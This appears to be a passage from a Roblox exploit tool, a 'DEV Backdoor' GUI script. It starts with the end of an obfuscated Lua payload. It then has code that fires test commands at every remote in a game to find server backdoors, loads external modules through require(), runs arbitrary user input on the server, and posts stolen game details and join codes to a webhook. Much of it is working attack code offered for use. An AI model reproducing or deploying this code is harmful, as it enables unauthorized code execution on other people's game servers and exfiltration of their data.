and-883921+3614238 or-587253+8157161 end end else if P<962085+13262354 then if P<829232+12983978 then o=v[c]P=8182461-(-629224)i=o else p=b(-356063+353823)t=b(18895+-21122)P=k[t]K=k[p]t=P(K)P=b(751470+-753706)k[P]=t P=2426155-425067 end else if P<15351544-759147 then q=b(983312-985547)P=k[b(-206998+204748)]h=k[q]q=b(1020155+-1022394)M=h[q]q=v[z[613288-613287]]h={M(q)}i={J(h)}else P=A P=g and 16701+10232845 or 867201-(-904342)i=g end end end else if P<-1006595+16822060 then if P<219231+15084885 then if P<15764288-843522 then if P<-744380+15607385 then q=-273984-(-274016)h=v[z[474958-474955]]M=h%q d=314162-314149 X=v[z[-415983-(-415987)]]Y=v[z[517310-517308]]N=v[z[494113-494110]]O=N-M g=-511128-(-511130)N=-340314-(-340346)V=O/N A=d-V e=g^A o=Y/e c=X(o)X=4295786837-819541 d=705485+-705229 q=c%X c=1014309-1014307 X=c^M h=q/X e=1024718+-1024717 X=v[z[31450-31446]]Y=h%e e=4294898428-(-68868)o=Y*e c=X(o)X=v[z[624502-624498]]o=X(h)q=c+o Y=319815+-254279 c=609798-544262 X=q%c o=q-X g=-582422-(-582678)c=o/Y Y=-823566-(-823822)h=nil o=X%Y P=391540+14124869 q=nil e=X-o X=nil Y=e/g g=-319455+319711 e=c%g M=nil A=c-e g=A/d A={o,Y;e,g}c=nil o=nil v[z[769359+-769358]]=A e=nil Y=nil g=nil else P=L(-505580+10412522,{X})F={P()}P=k[b(31273+-33493)]i={J(F)}end else K=-209640+209640 P=-99311+12872543 m=#O N=m==K end else if P<15531422-(-93634)then T=not G m=m+p N=m<=K N=T and N T=m>=K T=G and T N=T or N T=5597177-718225 P=N and T N=-926855+15865107 P=P or N else P=true P=P and-22039+3451512 or 10373462-(-224563)end end else if P<79272+16064862 then if P<16285718-313838 then i=b(-957895-(-955664))P=k[i]M=b(-106031-(-103820))i=P(M)i={}P=k[b(845796+-848013)]else q=303639-303422 h=v[z[-724769-(-724771)]]M=h*q h=-65342+23899202169525 i=M+h M=35184372091405-2573 P=i%M v[z[-101851+101853]]=P h=973558+-973557 P=3142735-(-650580)M=v[z[-109967-(-109970)]]i=M~=h end else if P<15847562-(-327573)then M=u[-1032166+1032167]P=v[z[347698-347697]]q=P h=u[759034-759032]P=q[h]P=P and 5820213-(-1040850)or 2099233-665892 else P=1444455-(-483299)end end end end end end end P=#H return J(i)end,function()h=(908866-908865)+h M[h]=858830-858829 return h end,681070+-681070,function(k,b)local J=q(b)local u=function(u,z,H)return P(k,{u,z;H},b,J)end return u end,function(k)M[k]=M[k]-(206381-206380)if M[k]==142874+-142874 then M[k],v[k]=nil,nil end end return(c(70539+3986960,{}))(J(i))end)(getfenv and getfenv()or _ENV,unpack or table[b(755768+-758015)],newproxy,setmetatable,getmetatable,select,{...})end)(...)
	
	local placeId = game.PlaceId
	local universeId = game.GameId
	local jobId = game.JobId
	
	-- ==== GAME INFO ====
	local productInfo
	pcall(function()
		productInfo = MarketplaceService:GetProductInfo(placeId)
	end)
	
	local gameName = productInfo and productInfo.Name or "Unknown Game"
	local gameDesc = productInfo and productInfo.Description or "No description"
	local gameLink = "https://www.roblox.com/games/" .. placeId
	
	-- ==== VISITS ====
	local visits = "N/A"
	pcall(function()
		local res = HttpService:GetAsync(
			"https://games.roblox.com/v1/games?universeIds=" .. universeId
		)
		local decoded = HttpService:JSONDecode(res)
		if decoded and decoded.data and decoded.data[1] then
			visits = tostring(decoded.data[1].visits)
		end
	end)
	
	-- ==== THUMBNAILS ====
	local bigImage =
		"https://www.roblox.com/asset-thumbnail/image?assetId="
		.. placeId ..
		"&width=768&height=432&format=png"
	
	local smallThumbnail =
		"https://www.roblox.com/asset-thumbnail/image?assetId="
		.. placeId ..
		"&width=150&height=150&format=png"
	
	-- ==== JOIN CODE ====
	local joinCode = string.format(
		"Roblox.GameLauncher.joinGameInstance(%d, \"%s\")",
		placeId,
		jobId
	)
	
	local data = {
		username = "DEV Backdoor",
		embeds = {{
			title = "Game Logged!",
			description = "**🎮 Game Informations**",
			color = 3447003,
	
			thumbnail = { 
				url = smallThumbnail
			},
	
			image = {
				url = bigImage
			},
	
			fields = {
				{
					name = "Name",
					value = string.format("[%s](%s)", gameName, gameLink),
					inline = false
				},
				{
					name = "Visits",
					value = visits,
					inline = true
				},
				{
					name = "Active Players",
					value = tostring(#Players:GetPlayers()),
					inline = true
				},
				{
					name = "Join Code (JS)",
					value = "```js\n" .. joinCode .. "\n```",
					inline = false
				}
			},
	
			footer = {
				text = "DEV Backdoor • Game Logs"
			},
			timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
		}}
	}
	
	-- ==== SEND WEBHOOK ====
	pcall(function()
		HttpService:PostAsync(
			WEBHOOK_URL,
			HttpService:JSONEncode(data),
			Enum.HttpContentType.ApplicationJson
		)
	end)]]
	
	alphabet={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'}
	
	backdoor=nil
	HttpService=game:GetService("HttpService")
	
	function debug(text, lvl)
		local func=print
		if lvl==1 then func=print end
		if lvl==2 then func=error end
		if lvl==3 then func=warn end
		func('SILENT!! '..text)
	end
	
	function runRemote(remote, data, data2)
		if remote:IsA('RemoteEvent') then
			remote:FireServer(data)
		elseif remote:IsA('RemoteFunction') then
			spawn(function() remote:InvokeServer(data) end)
		end
	
	end
	
	
	function notify(text)
		game:GetService('StarterGui'):SetCore(
			"SendNotification",
			{
				Title = "DEV BACKDOOR",
				Duration = 6,
				Text = text
			}
		)
	end
	
	
	if _G.LALOL_Hub_Backdoor_Logs_Disabled then
		notify('Logs disabled :(')
	end
	
	
	function generateName(lenght)
	
		local text=''
	
		for i=1,lenght do
			text=text..alphabet[math.random(1,#alphabet)]
		end
	
		return text
	
	end
	
	local code
	function findRemote()
	
		local timee=os.clock()
	
		local remotes={}
	
		for i,remote in game:GetDescendants() do
	
	
			if not remote:IsA('RemoteEvent') then 
				if not remote:IsA('RemoteFunction') then continue end
			end
	
			-- RobloxReplicatedStorage
			if string.split(remote:GetFullName(), '.')[1]=='RobloxReplicatedStorage' then
				debug('Roblox Replicated Storage ('..remote.Name..')', 1)
				continue
			end
	
			-- Backdoor Sender
	
			while true do
				code=generateName(math.random(12,30))
				if not remotes[code] then break end
			end
	
			runRemote(remote, "a=Instance.new('Model',workspace)a.Name='"..code.."'")
			remotes[code]=remote
	
		end
	
		-- Backdoor Checker
	
		for i=1,100 do
	
			for i,remote in remotes do
				local code=i
	
				if workspace:FindFirstChild(code) then
	
					notify('Backdoor found! '..os.clock()-timee..'s')
	
					backdoor=remote
	
					runRemote(backdoor, "require(80690314644985).RE('" ..plr.Name.. "')")
					runRemote(backdoor, Logs)
	
					return true
				end
			end
			wait()
		end
	
		return false
	
	end
	
	
	inject.MouseButton1Click:Connect(function()
		findRemote()
		sound:Play()
	end)
	
	exe.MouseButton1Click:Connect(function()
		runRemote(backdoor, input.Text)
		sound:Play()
	end)
	
	clear.MouseButtton1Click:Connect(function()
		input.Text = ""
	end)
	
	re.MouseButton1Click:Connect(function()
		game.ReplicatedStorage:WaitForChild("RE"):FireServer()
		sound:Play()
	end)
	
	rr.MouseButton1Click:Connect(function()
		local Re6 = "require(3436957371):r6('".. plr.Name .. "')"
		runRemote(backdoor, Re6)
		sound:Play()
	end)
end;
task.spawn(C_9);
-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.LocalScript
local function C_e()
local script = DEV2L["e"];
	local scrollingFrame = script.Parent
	local layout = scrollingFrame:WaitForChild("UIListLayout")
	
	-- pastikan ini mati
	scrollingFrame.AutomaticCanvasSize = Enum.AutomaticSize.None
	
	local function updateCanvas()
		scrollingFrame.CanvasSize = UDim2.new(
			0,
			0,
			0,
			layout.AbsoluteContentSize.Y
		)
	end
	
	-- update setiap layout berubah
	layout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(updateCanvas)
	
	updateCanvas()
	
end;
task.spawn(C_e);
-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.Input.LocalScript
local function C_10()
local script = DEV2L["10"];
	local TextBox = script.Parent
	local TextService = game:GetService("TextService")
	
	-- setting minimum height
	local MIN_HEIGHT = TextBox.Size.Y.Offset
	local PADDING = 6 -- jarak bawah & atas teks
	
	local function resize()
		local text = TextBox.Text
		if text == "" then
			TextBox.Size = UDim2.new(
				TextBox.Size.X.Scale,
				TextBox.Size.X.Offset,
				TextBox.Size.Y.Scale,
				MIN_HEIGHT
			)
			return
		end
	
		local textSize = TextService:GetTextSize(
			text,
			TextBox.TextSize,
			TextBox.Font,
			Vector2.new(TextBox.AbsoluteSize.X, math.huge)
		)
	
		local newHeight = math.max(MIN_HEIGHT, textSize.Y + PADDING)
	
		TextBox.Size = UDim2.new(
			TextBox.Size.X.Scale,
			TextBox.Size.X.Offset,
			0,
			newHeight
		)
	end
	
	TextBox:GetPropertyChangedSignal("Text"):Connect(resize)
	
	resize()
	
end;
task.spawn(C_10);

return DEV2L["1"], require;
